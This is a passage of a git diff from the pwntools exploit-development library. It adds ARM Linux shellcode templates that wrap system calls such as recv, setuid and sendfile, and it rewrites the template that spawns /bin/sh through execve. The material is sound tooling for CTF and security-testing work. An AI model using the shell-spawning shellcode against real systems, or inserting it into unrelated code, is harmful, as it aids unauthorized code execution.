+<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/readv.asm b/pwnlib/shellcraft/templates/arm/linux/readv.asm new file mode 100644 index 000000000..49f1cc4f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recv.asm b/pwnlib/shellcraft/templates/arm/linux/recv.asm new file mode 100644 index 000000000..a47082e60 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm b/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm new file mode 100644 index 000000000..9d1dee4ac --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm new file mode 100644 index 000000000..c89894b92 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm b/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm new file mode 100644 index 000000000..08a5d06cd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm new file mode 100644 index 000000000..0ea82825c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/rename.asm b/pwnlib/shellcraft/templates/arm/linux/rename.asm new file mode 100644 index 000000000..0415d2085 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/arm/linux/renameat.asm b/pwnlib/shellcraft/templates/arm/linux/renameat.asm new file mode 100644 index 000000000..c9f39e916 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/arm/linux/rmdir.asm b/pwnlib/shellcraft/templates/arm/linux/rmdir.asm new file mode 100644 index 000000000..aec43b858 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..2ac397988 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..9b33b2732 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm new file mode 100644 index 000000000..5a8d462b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm new file mode 100644 index 000000000..5abe46e9b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm new file mode 100644 index 000000000..1acf2ae55 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..01a5abfc5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm new file mode 100644 index 000000000..5eacbfac9 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm new file mode 100644 index 000000000..5e445dff4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm new file mode 100644 index 000000000..1969db5f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm b/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm new file mode 100644 index 000000000..44c5ccfcd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/arm/linux/select.asm b/pwnlib/shellcraft/templates/arm/linux/select.asm new file mode 100644 index 000000000..8c15aed68 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sendfile.asm b/pwnlib/shellcraft/templates/arm/linux/sendfile.asm new file mode 100644 index 000000000..fce854db1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm b/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm new file mode 100644 index 000000000..686b14f87 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm b/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm new file mode 100644 index 000000000..dc56d412e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setgid.asm b/pwnlib/shellcraft/templates/arm/linux/setgid.asm new file mode 100644 index 000000000..157017d8f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setgroups.asm b/pwnlib/shellcraft/templates/arm/linux/setgroups.asm new file mode 100644 index 000000000..8494c9069 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sethostname.asm b/pwnlib/shellcraft/templates/arm/linux/sethostname.asm new file mode 100644 index 000000000..7be4c893d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setitimer.asm b/pwnlib/shellcraft/templates/arm/linux/setitimer.asm new file mode 100644 index 000000000..b4869a291 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setpgid.asm b/pwnlib/shellcraft/templates/arm/linux/setpgid.asm new file mode 100644 index 000000000..c105c3aa5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setpriority.asm b/pwnlib/shellcraft/templates/arm/linux/setpriority.asm new file mode 100644 index 000000000..4319b0955 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setregid.asm b/pwnlib/shellcraft/templates/arm/linux/setregid.asm new file mode 100644 index 000000000..57d3145e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setresgid.asm b/pwnlib/shellcraft/templates/arm/linux/setresgid.asm new file mode 100644 index 000000000..f13673ba4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setresuid.asm b/pwnlib/shellcraft/templates/arm/linux/setresuid.asm new file mode 100644 index 000000000..c95e60339 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setreuid.asm b/pwnlib/shellcraft/templates/arm/linux/setreuid.asm new file mode 100644 index 000000000..7634ad1fe --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm b/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm new file mode 100644 index 000000000..ad787f7f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setsid.asm b/pwnlib/shellcraft/templates/arm/linux/setsid.asm new file mode 100644 index 000000000..4e9c6bb16 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm b/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm new file mode 100644 index 000000000..0ff71bb0b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsockopt.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall + from pwnlib.shellcraft.arm import push +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} + diff --git a/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..3c56a209c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setsockopt_timeout.asm @@ -0,0 +1,21 @@ + +<% + from pwnlib.shellcraft.arm.linux import setsockopt + from pwnlib.shellcraft.arm import push + from pwnlib.shellcraft.arm import mov + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt with specified timeout. See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + eor r4, r4, r4 + push {r4} + ${mov('r4', secs)} + push {r4} + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'sp', 8)} + diff --git a/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm b/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm new file mode 100644 index 000000000..4fa21562e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/arm/linux/setuid.asm b/pwnlib/shellcraft/templates/arm/linux/setuid.asm new file mode 100644 index 000000000..034e6511a --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sh.asm b/pwnlib/shellcraft/templates/arm/linux/sh.asm index 6b951322a..5da8106e1 100644 --- a/pwnlib/shellcraft/templates/arm/linux/sh.asm +++ b/pwnlib/shellcraft/templates/arm/linux/sh.asm @@ -1,7 +1,11 @@ -<%docstring>Execute /bin/sh +<% from pwnlib.shellcraft import arm %> +<%docstring> +Execute a different process. - adr r0, bin_sh - mov r2, #0 - mov r1, r2 - svc SYS_execve - bin_sh: .asciz "/bin/sh" + >>> p = run_assembly(shellcraft.arm.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' + + + ${arm.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigaction.asm b/pwnlib/shellcraft/templates/arm/linux/sigaction.asm new file mode 100644 index 000000000..0d3608c00 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm new file mode 100644 index 000000000..6bc6f5838 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/signal.asm b/pwnlib/shellcraft/templates/arm/linux/signal.asm new file mode 100644 index 000000000..cf820f084 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigpending.asm b/pwnlib/shellcraft/templates/arm/linux/sigpending.asm new file mode 100644 index 000000000..384b3dca4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm new file mode 100644 index 000000000..a3affc046 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm b/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm index aaccf63cd..57adce368 100644 --- a/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/arm/linux/sigreturn.asm @@ -1,5 +1,8 @@ -<% from pwnlib.shellcraft.arm.linux import syscall %> +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + - -<%docstring>Sigreturn system call - ${syscall('SYS_sigreturn', )} + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm new file mode 100644 index 000000000..21fc19afc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/arm/linux/splice.asm b/pwnlib/shellcraft/templates/arm/linux/splice.asm new file mode 100644 index 000000000..a68c8b660 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stat.asm b/pwnlib/shellcraft/templates/arm/linux/stat.asm new file mode 100644 index 000000000..e12fd2e4b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stat64.asm b/pwnlib/shellcraft/templates/arm/linux/stat64.asm new file mode 100644 index 000000000..e07e64980 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/stime.asm b/pwnlib/shellcraft/templates/arm/linux/stime.asm new file mode 100644 index 000000000..1813a6b45 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall 